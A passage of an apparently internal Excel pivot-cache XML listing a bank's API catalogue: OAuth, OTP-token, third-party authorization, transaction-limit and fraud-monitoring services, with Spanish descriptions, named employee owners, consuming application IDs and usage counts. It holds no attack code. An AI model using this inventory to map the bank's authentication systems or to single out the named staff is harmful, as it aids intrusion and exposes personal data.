    <n v="2819"/>
    <s v="API TEC"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2020-07-09T20:26:15"/>
    <s v="Tec-Notifications"/>
    <n v="101"/>
    <s v="Tec-Notifications  Send Alerts And Notifications"/>
    <n v="101"/>
    <x v="458"/>
    <s v="La presente API permite obtener la información para crear la estructura de un mensaje de alertas y notificaciones que deba enviarse a un cliente al momento de realizar una transacción. Estas transacciones se encuentran definidas en la sucursal virtual personas y existen también otro tipo de alertas que son obligatorias así­ el cliente no las haya configurado. Esta API consumirá el servicio EnvioAlertasyNotificaciones, que a su vez invoca la aplicación de alertas y notificaciones almacenada en el módulo PCC en el Iseries."/>
    <s v="CANALES_DIGITALES"/>
    <s v="Trasversales e Inclusión"/>
    <x v="6"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <s v="EnvioAlertasYNotificaciones/V1.0"/>
    <s v="PCC - Programas Comunes Canales_Alertas_ISPCC0002"/>
    <s v="BC_Herramientas_MonitoreoPrd _x000d__x000a_ CapaGestionCanal_NU0014001 _x000d__x000a_ Tokenizacion_NU0019001 _x000d__x000a_ Recargas_AW1300001 _x000d__x000a_ Tokenizacion_NU0103001"/>
    <n v="8234"/>
    <n v="6256"/>
    <n v="49340"/>
    <n v="73062"/>
    <n v="85331"/>
    <s v="API TEC"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2019-10-10T22:35:55"/>
    <s v="Tec-Security"/>
    <n v="173"/>
    <s v="Tec-OAuth - Provider from DID"/>
    <n v="130"/>
    <x v="459"/>
    <s v="Permite realizar la validación de la sesion de un usuario en los canales virtuales y del OTP generado por clave dinamica, y entregar un token de acceso"/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <x v="4"/>
    <s v="Productor"/>
    <m/>
    <s v="Magda Catalina Trejos"/>
    <m/>
    <m/>
    <s v="TMP_SVP_APP_PFM _x000d__x000a_ TMP SOPORTE APP_lgcorrg _x000d__x000a_ TMP AW0360004_CONSTRUCTOR_SVE _x000d__x000a_ BC_Herramientas_Monitoreo _x000d__x000a_ BC_Herramientas_MonitoreoPrd _x000d__x000a_ GestionaNegocios_AW1302001 _x000d__x000a_ TABOT_AW1165001 _x000d__x000a_ SVETDL_AW0360006 _x000d__x000a_ PortalLibranzas_AW0360007 _x000d__x000a_ BALMTEC_AW0955 _x000d__x000a_ MarketplaceEcosistemasPersonas_NU0035001 _x000d__x000a_ AppInversiones_AW1185001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="API TEC"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2020-11-05T00:47:28"/>
    <s v="Tec-Security"/>
    <n v="206"/>
    <s v="Tec-OAuth - Provider from DID"/>
    <n v="132"/>
    <x v="459"/>
    <s v="Permite realizar la validación de la sesion de un usuario en los canales virtuales y del OTP generado por clave dinamica, y entregar un token de acceso"/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <x v="4"/>
    <s v="Productor"/>
    <m/>
    <s v="Magda Catalina Trejos"/>
    <s v="                                              "/>
    <m/>
    <s v="TMP Boton Bancolombia_BDT _x000d__x000a_ SUID_AW1310 _x000d__x000a_ MascaraTransaccional_NU0021001 _x000d__x000a_ PortalConstructor_AW0360004 _x000d__x000a_ AppInversiones_AW1185001 _x000d__x000a_ MarketplaceEcosistemasPersonas_NU0035001 _x000d__x000a_ BCHerramientasMonitoreoPrd2 _x000d__x000a_ FUA_AW1291001 _x000d__x000a_ NEQUIMAPAS_AW1011 _x000d__x000a_ CapaGestionCanal_NU0014001"/>
    <n v="23103"/>
    <n v="12603"/>
    <n v="80018"/>
    <n v="151727"/>
    <n v="174106"/>
    <s v="API TEC"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2019-10-10T22:35:55"/>
    <s v="Tec-Security"/>
    <n v="173"/>
    <s v="Tec-OAuth - Provider from OTP"/>
    <n v="120"/>
    <x v="460"/>
    <s v="No tiene Descipcion"/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <x v="4"/>
    <s v="Productor"/>
    <m/>
    <s v="Magda Catalina Trejos"/>
    <m/>
    <m/>
    <s v="TMP_SVP_APP_PFM _x000d__x000a_ TMP SOPORTE APP_lgcorrg _x000d__x000a_ TMP AW0360004_CONSTRUCTOR_SVE _x000d__x000a_ BC_Herramientas_Monitoreo _x000d__x000a_ BC_Herramientas_MonitoreoPrd _x000d__x000a_ GestionaNegocios_AW1302001 _x000d__x000a_ TABOT_AW1165001 _x000d__x000a_ SVETDL_AW0360006 _x000d__x000a_ PortalLibranzas_AW0360007 _x000d__x000a_ BALMTEC_AW0955 _x000d__x000a_ MarketplaceEcosistemasPersonas_NU0035001 _x000d__x000a_ AppInversiones_AW1185001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="API TEC"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2019-10-10T22:35:55"/>
    <s v="Tec-Security"/>
    <n v="206"/>
    <s v="Tec-OAuth - Provider from OTP"/>
    <n v="120"/>
    <x v="460"/>
    <s v="Esta API de OAuth permite generar un token de autorización en APIC a partir del Id de sesión generados en los canales con los servicios de WAS cambiar código por token"/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <x v="4"/>
    <s v="Productor"/>
    <m/>
    <s v="Magda Catalina Trejos"/>
    <s v="GestionLlaveCifrado/V1.0"/>
    <m/>
    <s v="TMP Boton Bancolombia_BDT _x000d__x000a_ SUID_AW1310 _x000d__x000a_ MascaraTransaccional_NU0021001 _x000d__x000a_ PortalConstructor_AW0360004 _x000d__x000a_ AppInversiones_AW1185001 _x000d__x000a_ MarketplaceEcosistemasPersonas_NU0035001 _x000d__x000a_ BCHerramientasMonitoreoPrd2 _x000d__x000a_ FUA_AW1291001 _x000d__x000a_ NEQUIMAPAS_AW1011 _x000d__x000a_ CapaGestionCanal_NU0014001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="API TEC"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2020-02-11T14:18:09"/>
    <s v="Tec-Security"/>
    <n v="173"/>
    <s v="Tec-OAuth - Provider from WAS SessionId"/>
    <n v="143"/>
    <x v="461"/>
    <s v="Api que permite cambiar el Id de sesión para canales virtuales por un token de acceso"/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <x v="12"/>
    <s v="Productor"/>
    <s v="Gestión de Identidades"/>
    <s v="Mariluz Velasquez Suarez"/>
    <m/>
    <m/>
    <s v="TMP_SVP_APP_PFM _x000d__x000a_ TMP SOPORTE APP_lgcorrg _x000d__x000a_ TMP AW0360004_CONSTRUCTOR_SVE _x000d__x000a_ BC_Herramientas_Monitoreo _x000d__x000a_ BC_Herramientas_MonitoreoPrd _x000d__x000a_ GestionaNegocios_AW1302001 _x000d__x000a_ TABOT_AW1165001 _x000d__x000a_ SVETDL_AW0360006 _x000d__x000a_ PortalLibranzas_AW0360007 _x000d__x000a_ BALMTEC_AW0955 _x000d__x000a_ MarketplaceEcosistemasPersonas_NU0035001 _x000d__x000a_ AppInversiones_AW1185001"/>
    <n v="6"/>
    <n v="9"/>
    <n v="64"/>
    <n v="710"/>
    <n v="383"/>
    <s v="API TEC"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2020-10-05T13:37:37"/>
    <s v="Tec-Security"/>
    <n v="206"/>
    <s v="Tec-OAuth - Provider from WAS SessionId"/>
    <n v="204"/>
    <x v="461"/>
    <s v="Api que permite cambiar el Id de sesión para canales virtuales por un token de acceso"/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <x v="12"/>
    <s v="Productor"/>
    <s v="Gestión de Identidades"/>
    <s v="Mariluz Velasquez Suarez"/>
    <m/>
    <s v="FUA-Front Unico de Autenticación_AW1291001, Servicio genérico de autenticación _AW1160001"/>
    <s v="TMP Boton Bancolombia_BDT _x000d__x000a_ SUID_AW1310 _x000d__x000a_ MascaraTransaccional_NU0021001 _x000d__x000a_ PortalConstructor_AW0360004 _x000d__x000a_ AppInversiones_AW1185001 _x000d__x000a_ MarketplaceEcosistemasPersonas_NU0035001 _x000d__x000a_ BCHerramientasMonitoreoPrd2 _x000d__x000a_ FUA_AW1291001 _x000d__x000a_ NEQUIMAPAS_AW1011 _x000d__x000a_ CapaGestionCanal_NU0014001"/>
    <n v="1075"/>
    <n v="668"/>
    <n v="8073"/>
    <n v="563366"/>
    <n v="320165"/>
    <s v="API TEC"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2020-01-08T21:55:26"/>
    <s v="Tec-Security"/>
    <n v="173"/>
    <s v="Tec-OAuth-Provider From Simple Customer Authentication"/>
    <n v="101"/>
    <x v="462"/>
    <s v="No tiene Descipcion"/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <x v="12"/>
    <s v="Productor"/>
    <s v="Gestión de Identidades"/>
    <s v="Mariluz Velasquez Suarez"/>
    <s v="GestionLlaveCifrado/V1.0"/>
    <m/>
    <s v="TMP_SVP_APP_PFM _x000d__x000a_ TMP SOPORTE APP_lgcorrg _x000d__x000a_ TMP AW0360004_CONSTRUCTOR_SVE _x000d__x000a_ BC_Herramientas_Monitoreo _x000d__x000a_ BC_Herramientas_MonitoreoPrd _x000d__x000a_ GestionaNegocios_AW1302001 _x000d__x000a_ TABOT_AW1165001 _x000d__x000a_ SVETDL_AW0360006 _x000d__x000a_ PortalLibranzas_AW0360007 _x000d__x000a_ BALMTEC_AW0955 _x000d__x000a_ MarketplaceEcosistemasPersonas_NU0035001 _x000d__x000a_ AppInversiones_AW1185001"/>
    <n v="9327"/>
    <n v="1034"/>
    <n v="677"/>
    <n v="1463"/>
    <n v="3350"/>
    <s v="API TEC"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2020-10-05T13:37:37"/>
    <s v="Tec-Security"/>
    <n v="206"/>
    <s v="Tec-OAuth-Provider From Simple Customer Authentication"/>
    <n v="104"/>
    <x v="462"/>
    <s v="Esta API de OAuth permite generar un token de autorización en APIConnect a partir del id de sesión generado en el WAS, Token generado por AutenticacionCliente en Datapower."/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <x v="12"/>
    <s v="Productor"/>
    <s v="Gestión de Identidades"/>
    <s v="Mariluz Velasquez Suarez"/>
    <s v="GestionLlaveCifrado/V1.0"/>
    <s v="FUA-Front Unico de Autenticación_AW1291001, Servicio genérico de autenticación _AW1160001"/>
    <s v="TMP Boton Bancolombia_BDT _x000d__x000a_ SUID_AW1310 _x000d__x000a_ MascaraTransaccional_NU0021001 _x000d__x000a_ PortalConstructor_AW0360004 _x000d__x000a_ AppInversiones_AW1185001 _x000d__x000a_ MarketplaceEcosistemasPersonas_NU0035001 _x000d__x000a_ BCHerramientasMonitoreoPrd2 _x000d__x000a_ FUA_AW1291001 _x000d__x000a_ NEQUIMAPAS_AW1011 _x000d__x000a_ CapaGestionCanal_NU0014001"/>
    <n v="12"/>
    <n v="18"/>
    <n v="38"/>
    <m/>
    <m/>
    <s v="API TEC"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2020-03-18T20:19:30"/>
    <s v="Tec-Reference Data Management"/>
    <n v="120"/>
    <s v="Tec-Reference Data Management - Util Reference Information"/>
    <n v="101"/>
    <x v="463"/>
    <s v="Consulta de información de referencia necesaria para la gestión de las entidades del producto de gestión de nómina, inicialmente se plantean consulta de: Departamentos, ciudades, bancos, cajas de compensación, EPS, fondos de pensiones, ARLs, fondos de cesantí­as, operadores de seguridad social y software contables."/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Filiales del Exterior"/>
    <x v="0"/>
    <s v="Productor"/>
    <s v="Filiales del Exterior"/>
    <m/>
    <m/>
    <s v="nomina app"/>
    <s v="EDPYME_AW1170 _x000d__x000a_ BC_Herramientas_MonitoreoPrd _x000d__x000a_ CapaGestionCanal_NU0014001"/>
    <n v="73"/>
    <n v="50"/>
    <n v="1231"/>
    <n v="2055"/>
    <n v="2867"/>
    <s v="API TEC"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2020-07-07T03:41:36"/>
    <s v="Tec-Security WAS"/>
    <n v="202"/>
    <s v="Tec-Security - Code Validation"/>
    <n v="202"/>
    <x v="464"/>
    <s v="Esta API permite realizar el proceso de autenticación OAuth 2.0 expuesto en WAS, por medio de la verificación de un código de autorización que es previamente generado y posteriormente enviado por el cliente, si el proceso es exitoso genera un access_token con este sistema de autenticación."/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <x v="12"/>
    <s v="Productor"/>
    <s v="Gestión de Identidades"/>
    <s v="Mariluz Velasquez Suarez"/>
    <s v="GestionAutenticacionOAuth2/V1.0"/>
    <s v="FUA-Front Unico de Autenticación_AW1291001, Servicio genérico de autenticación _AW1160001"/>
    <s v="TMP_SVP_APP_PFM _x000d__x000a_ TMP Boton Bancolombia_BDT _x000d__x000a_ BC_Herramientas_Monitoreo _x000d__x000a_ BC_Herramientas_MonitoreoPrd _x000d__x000a_ TMP SOPORTE APP_lgcorrg _x000d__x000a_ MarketplaceEcosistemasPersonas_NU0035001 _x000d__x000a_ FUA_AW1291001"/>
    <n v="211143"/>
    <n v="146619"/>
    <n v="959799"/>
    <n v="1784964"/>
    <n v="1886227"/>
    <s v="API TEC"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2019-12-12T21:36:33"/>
    <s v="Tec-Token"/>
    <n v="100"/>
    <s v="Tec-Token - Management"/>
    <n v="100"/>
    <x v="465"/>
    <s v="API que permite la gestión del token para clientes y no clientes, utilizado por cualquier aplicación que requiere hacer uso de una autenticación OTP mediante la generación de un token. Esta generación de un token puede ser enviado ví­a celular como un mensaje de texto o al correo electrónico permitiéndole el uso de una plantilla para el mensaje; para así­ autenticar el cliente."/>
    <s v="CANALES_DIGITALES"/>
    <s v="Trasversales e Inclusión"/>
    <x v="6"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <s v="GeneracionToken/V1.0"/>
    <m/>
    <s v="BC_Herramientas_MonitoreoPrd _x000d__x000a_ plink_AW1206001"/>
    <n v="26"/>
    <n v="21"/>
    <n v="137"/>
    <n v="209"/>
    <n v="201"/>
    <s v="API TEC"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2020-08-04T12:12:22"/>
    <s v="Tec-Token"/>
    <n v="210"/>
    <s v="Tec-Token - Management"/>
    <n v="210"/>
    <x v="465"/>
    <s v="API que permite la gestión del token para clientes y no clientes, utilizado por cualquier aplicación que requiere hacer uso de una autenticación OTP mediante la generación de un token. Esta generación de un token puede ser enviado ví­a celular como un mensaje de texto o al correo electrónico permitiéndole el uso de una plantilla para el mensaje; para así­ autenticar el cliente."/>
    <s v="CANALES_DIGITALES"/>
    <s v="Trasversales e Inclusión"/>
    <x v="6"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <s v="GeneracionToken/V1.0"/>
    <s v="_x000a_PCC - Programas Comunes Canales_Generación y validación de pines_ISPCC0008"/>
    <s v="CapaGestionCanal_NU0014001"/>
    <n v="22100"/>
    <n v="16165"/>
    <n v="103856"/>
    <n v="156387"/>
    <n v="181976"/>
    <s v="API TEC"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2020-09-24T22:27:50"/>
    <s v="Tec-Transaction"/>
    <n v="102"/>
    <s v="Tec-Transaction-Transactional Monitoring"/>
    <n v="102"/>
    <x v="466"/>
    <s v="La API â€œMonitoreo Transaccionalâ€? ofrece la capacidad de evaluar las transacciones permitiendo calificar  el nivel de anomalí­a (en relación con su comportamiento habitual) en una transacción especí­fica aplicando sobre la misma los filtros o alertas definidos a nivel de Reglas (Institucionales y de Cuenta), Analizadores (de Actividad Sospechosa) y RTA (Analizadores en Tiempo Real) de motor heurí­stico y de aprendizaje automatizado; entregando conjuntamente una calificación de riesgo de la transacción y una alerta proveniente de las reglas que apliquen sobre las mismas. Adicionalmente, este servicio permite declinar la transacción en tiempo real y guardar el estado final de la misma. Esta API de evaluación se puede solicitar desde diferentes canales, no solo desde el canal de Internet, sino por ejemplo desde el canal móvil. Adicional, esta podrí­a monitorear cualquier transacción, pero debe ser validado con la Dirección de Gestión de Fraude."/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <x v="12"/>
    <s v="Productor"/>
    <s v="Monitoreo y Transversales"/>
    <s v="Hair Alexander Morales"/>
    <m/>
    <s v="Finacle - F.E_Panama_AW0709001"/>
    <s v="App inversionesGB_AW1185001 _x000d__x000a_ BC_Herramientas_Monitoreo"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="API Pro FE"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2020-09-24T22:27:50"/>
    <s v="Tec-Transaction"/>
    <n v="200"/>
    <s v="Tec-Transaction-Transactional Monitoring"/>
    <n v="200"/>
    <x v="466"/>
    <s v="La API â€œMonitoreo Transaccionalâ€? ofrece la capacidad de evaluar las transacciones permitiendo calificar  el nivel de anomalí­a (en relación con su comportamiento habitual) en una transacción especí­fica aplicando sobre la misma los filtros o alertas definidos a nivel de Reglas (Institucionales y de Cuenta), Analizadores (de Actividad Sospechosa) y RTA (Analizadores en Tiempo Real) de motor heurí­stico y de aprendizaje automatizado; entregando conjuntamente una calificación de riesgo de la transacción y una alerta proveniente de las reglas que apliquen sobre las mismas. Adicionalmente, este servicio permite declinar la transacción en tiempo real y guardar el estado final de la misma. Esta API de evaluación se puede solicitar desde diferentes canales, no solo desde el canal de Internet, sino por ejemplo desde el canal móvil. Adicional, esta podrí­a monitorear cualquier transacción, pero debe ser validado con la Dirección de Gestión de Fraude."/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <x v="12"/>
    <s v="Productor"/>
    <s v="Monitoreo y Transversales"/>
    <s v="Hair Alexander Morales"/>
    <m/>
    <s v="Finacle - F.E_Panama_AW0709001"/>
    <s v="App inversionesGB_AW1185001"/>
    <n v="11043"/>
    <n v="10795"/>
    <m/>
    <m/>
    <m/>
    <s v="API Pro FE"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-08-18T17:55:43"/>
    <s v="Third Party Authentication"/>
    <n v="112"/>
    <s v="Third Party Authentication - Management"/>
    <n v="112"/>
    <x v="467"/>
    <s v="Entregara al tercero la URL delformulario de autenticacion"/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <x v="12"/>
    <s v="Productor"/>
    <s v="Autorizaciones"/>
    <s v="Daniel Esteban Ramirez Correa"/>
    <m/>
    <m/>
    <s v="BancolombiaPay_AW1435001 _x000d__x000a_ TestAPIConnectPDN"/>
    <m/>
    <m/>
    <n v="11"/>
    <n v="5"/>
    <n v="74"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2022-04-18T14:15:41"/>
    <s v="Third Party Authorization"/>
    <n v="111"/>
    <s v="Third Party Authorization - Information"/>
    <n v="100"/>
    <x v="468"/>
    <s v="El API permite consultar el detalle de las relaciones que tiene un cliente con el comercio y producto donde se detalla la autorización que tiene para poder tranzar con los comercios y productos registrados"/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <x v="12"/>
    <s v="Productor"/>
    <s v="Autorizaciones"/>
    <s v="Daniel Esteban Ramirez Correa"/>
    <m/>
    <m/>
    <s v="BancolombiaPay_AW1435001 _x000d__x000a_ MascaraTransaccional_NU0021001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-12-06T21:59:15"/>
    <s v="Third Party Authorization"/>
    <n v="111"/>
    <s v="Third Party Authorization - Management"/>
    <n v="111"/>
    <x v="469"/>
    <s v="gestionar las autorizaciones que un cliente puede entregar a un tercero sobre los productos que tiene en banco"/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <x v="12"/>
    <s v="Productor"/>
    <s v="Autorizaciones"/>
    <s v="Daniel Esteban Ramirez Correa"/>
    <m/>
    <m/>
    <s v="BancolombiaPay_AW1435001 _x000d__x000a_ MascaraTransaccional_NU0021001"/>
    <m/>
    <n v="44"/>
    <m/>
    <m/>
    <n v="24"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2020-09-08T16:32:14"/>
    <s v="Token"/>
    <n v="101"/>
    <s v="Token - Management"/>
    <n v="101"/>
    <x v="470"/>
    <s v="API que permite la gestión del token para clientes y no clientes, utilizado por cualquier aplicación que requiere hacer uso de una autenticación OTP mediante la generación de un token. Esta generación de un token puede ser enviado ví­a celular como un mensaje de texto o al correo electrónico permitiéndole el uso de una plantilla para el mensaje; para así­ autenticar el cliente."/>
    <s v="CANALES_DIGITALES"/>
    <s v="Trasversales e Inclusión"/>
    <x v="6"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <s v="GeneracionToken/V1.0"/>
    <s v="_x000a_PCC - Programas Comunes Canales_Generación y validación de pines_ISPCC0008"/>
    <s v="ALM_AW0955001 _x000d__x000a_ ALM_AW0955 _x000d__x000a_ EASYHOME_NU0004001 _x000d__x000a_ JornadaDepositos_NU0104001 _x000d__x000a_ ConfirmacionOpCadena_NU0127001 _x000d__x000a_ VINCUTRANS_NU0034001 _x000d__x000a_ NETWORKING_NU0046001 _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ ConsumerOTP_AW0660 _x000d__x000a_ BancolombiaPay_AW1435001 _x000d__x000a_ PreaprobadosSucursales_AW1299001"/>
    <n v="29020"/>
    <n v="35802"/>
    <n v="42135"/>
    <n v="42716"/>
    <n v="48721"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2017-10-12T19:40:10"/>
    <s v="Security"/>
    <n v="111"/>
    <s v="Token OTP - Token Validating"/>
    <n v="100"/>
    <x v="471"/>
    <s v="API para validar token OTP"/>
    <s v="CANALES_DIGITALES"/>
    <s v="Trasversales e Inclusión"/>
    <x v="6"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <s v="GeneracionToken/V1.0"/>
    <m/>
    <s v="CHATBOT _x000d__x000a_ Vinculación Digital _x000d__x000a_ Dummy _x000d__x000a_ Remitly APP1_RTY _x000d__x000a_ BC Portal de Contenido_AW1218001 _x000d__x000a_ TransferWise_TNW"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="API Pro"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2020-08-14T16:40:11"/>
    <s v="Trade Finance"/>
    <n v="101"/>
    <s v="Trade Finance - Commission Rates"/>
    <n v="100"/>
    <x v="472"/>
    <s v="El API servicio Trade Finance  Commission Rates tiene como objetivo consultar una comisión en especí­fico. En este servicio se toman en cuenta todas las comisiones que se tienen en las Filiales del Exterior"/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Filiales del Exterior"/>
    <x v="0"/>
    <s v="Productor"/>
    <s v="Filiales del Exterior"/>
    <m/>
    <s v="GestionComisionesFiliales/V1.0"/>
    <m/>
    <s v="TMP1 johucorr_AW1185001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="API Pro FE"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Transaccion Token InvestBot"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El servicio Transaccion Token Investbot, permite generar un token de transacción para poder realizar transacciones (consulta de productos de un cliente o hacer transferencias) en valores desde InvestBot."/>
    <s v="NEGOCIOS_DE_INVERSION"/>
    <s v="Valores"/>
    <x v="19"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <s v="Servicios Valores_AW1273001"/>
    <s v="AW1187001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Transacciones Medios De Pago"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El servicio Transacciones Medios de Pago permite ejecutar transacciones monetarias a través del Motor de Pagos de Medios de pago. Estas transacciones cuentan con reglas de negocio propias del proveedor (por ejemplo, la capacidad de acreditar tiene la opción de enviar una notificación adicional a las que se tienen por defecto con Alertas y Notificaciones para el pagador y el receptor del dinero), por lo cual se debe validar funcionalmente antes de solicitar su re-uso."/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Servicios Transaccionales MP"/>
    <x v="15"/>
    <s v="Productor"/>
    <s v="Servicios Transaccionales MP"/>
    <s v="Alfredo Alonso Parra Laverde"/>
    <m/>
    <s v="ECP_ISECP0001"/>
    <s v="AW1011"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-08-03T15:16:56"/>
    <s v="Transactions Limit"/>
    <n v="100"/>
    <s v="Transactions Limit - Maximum Transaction Amounts"/>
    <n v="100"/>
    <x v="473"/>
    <s v="API para la gestión de topes monetarios que tiene un cliente. Los topes indican la cantidad de dinero que puede debitar dicho cliente durante el dí­a o mes segíºn sea el caso. Las funcionalidades expuestas permiten:     - Actualizar el acumulado de las transacciones hechas por el cliente durante el dí­a para poder determinar hasta que momento puede debitarse de sus cuentas.   - Consultar el monto lí­mite establecido por el cliente desde la sucursal virtual personas o los montos establecidos por el banco.    -  Reversar las transacciones en caso de que se requiera.    - Validar las transacciones, con el fin de determinar si se puede o no realizar una transacción monetaria."/>
    <s v="CANALES_DIGITALES"/>
    <s v="Canales Digitales Personas"/>
    <x v="6"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <s v="GestionDeTopesMontosClientes/V2.0"/>
    <m/>
    <s v="ALM_AW0955001 _x000d__x000a_ ALM_AW0955001 _x000d__x000a_ BancolombiaPay_AW1435001"/>
    <m/>
    <m/>
    <n v="1"/>
    <m/>
    <n v="36"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2022-05-04T13:09:01"/>
    <s v="Transactions Limits"/>
    <n v="101"/>
    <s v="Transactions Limits - Transaction Limit Amount"/>
    <n v="101"/>
    <x v="474"/>
    <s v="API para la gestión de topes monetarios que tiene un cliente. Los topes indican la cantidad de dinero que puede debitar dicho cliente durante el dí­a o mes segíºn sea el caso. Las funcionalidades expuestas permiten:     - Actualizar el acumulado de las transacciones hechas por el cliente durante el dí­a para poder determinar hasta que momento puede debitarse de sus cuentas.   - Consultar el monto lí­mite establecido por el cliente desde la sucursal virtual personas o los montos establecidos por el banco.    -  Reversar las transacciones en caso de que se requiera.    - Validar las transacciones, con el fin de determinar si se puede o no realizar una transacción monetaria."/>
    <s v="CANALES_DIGITALES"/>
    <s v="Canales Digitales Personas"/>
    <x v="6"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <m/>
    <s v="BancolombiaPay_AW1435001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <n v="45"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2020-07-13T13:13:04"/>
    <s v="Transaction"/>
    <n v="203"/>
    <s v="Transaction-Transactional Monitoring"/>
    <n v="202"/>
    <x v="475"/>
    <s v="La API 'Monitoreo Transaccional'? ofrece la capacidad de evaluar las transacciones permitiendo calificar el nivel de anomalí­a (en relación con su comportamiento habitual) en una transacción especí­fica aplicando sobre la misma los filtros o alertas definidos a nivel de Reglas (Institucionales y de Cuenta), Analizadores (de Actividad Sospechosa) y RTA (Analizadores en Tiempo Real) de motor heurí­stico y de aprendizaje automatizado; entregando conjuntamente una calificación de riesgo de la transacción y una alerta proveniente de las reglas que apliquen sobre las mismas. Adicionalmente, este servicio permite declinar la transacción en tiempo real y guardar el estado final de la misma. Esta API de evaluación se puede solicitar desde diferentes canales, no solo desde el canal de Internet, sino por ejemplo desde el canal móvil. Adicional, esta podrí­a monitorear cualquier transacción, pero debe ser validado con la Dirección de Gestión de Fraude."/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <x v="12"/>
    <s v="Productor"/>
    <s v="Monitoreo y Transversales"/>
    <s v="Hair Alexander Morales"/>
    <m/>
    <m/>
    <s v="EDPYME_AW1170"/>
    <n v="3143578"/>
    <n v="2956400"/>
    <n v="2865356"/>
    <n v="3160069"/>
